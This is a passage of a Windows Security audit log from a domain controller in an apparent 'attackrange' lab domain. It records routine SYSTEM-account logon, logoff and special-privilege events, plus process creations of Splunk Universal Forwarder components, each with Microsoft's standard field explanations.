Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264298
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E997C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:02:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264306
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EA6ED
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:02:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264305
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EA6ED
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62503
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:02:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264304
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EA6ED
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:03:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264308
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1140
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264307
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1908
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264309
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264310
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264311
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x180c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264313
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x199c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264312
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1644
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264316
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE148
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:03:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264315
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE148
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62516
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:03:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264314
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE148
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264327
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE5F3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264326
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE6E1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264325
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE729
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264324
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE79B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62521
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264323
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE79B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264322
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE729
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62520
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264321
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE729
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264320
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE6E1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264319
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE6E1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264318
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE5F3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62519
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264317
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE5F3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264329
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
